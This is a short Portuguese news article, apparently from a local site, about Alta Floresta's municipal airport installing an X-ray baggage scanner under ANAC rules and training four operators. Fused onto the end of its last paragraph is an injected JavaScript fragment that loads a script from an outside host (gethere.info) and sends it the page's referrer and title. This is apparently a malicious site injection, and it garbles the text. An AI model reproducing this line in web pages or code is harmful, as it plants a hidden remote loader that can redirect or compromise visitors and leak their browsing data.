Capa / Em Destaque / Empresa instala scanner de raio-x e treina funcionários

Empresa instala scanner de raio-x e treina funcionários

raiox-e-esteira-1Dionéia Martins

A principal porta de entrada dos turistas em Alta Floresta, o aeroporto municipal Piloto Oswaldo Marques Dias, atendendo a exigência da Agência Nacional de Aviação Civil – ANAC, instalou o aparelho de scanner de raio-x de inspeção de bagagem de mão.

Os técnicos da empresa que vendeu o aparelho chegaram ao município na quarta-feira, 21, e instalaram o equipamento que trará mais segurança para os usuários dos voos, e também deram o treinamento para os profissionais que irão operar o aparelho.

Para operar o aparelho de scanner de raio-x, é necessários que os profissionais passem por um treinamento e depois por uma banca avaliadora da ANAC. Os quatro profissionais que vão trabalhar com o aparelho embarcam no próximo domingo para Brasília para passar pela banca.

Mas, o aparelho já está em funcionamento, por enquanto o gestor de segurança do aeroporto, Gilbert Vaes, que já tem a autorização da ANAC, está realizando o procedimento até que os 4 profissionais estejam habilitados pela Agência.

Hoje os técnicos da empresa que vendeu a esteira, que dará mais conforto para os passageiros, chega ao município para instalar o aparelho. A partir da próxima semana, o aeroporto de Alta Floresta estará com os dois aparelhos em funcionamento, dando mais segurança e conforto para os passageiros que utilizam o aeroporto do município diariamente.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top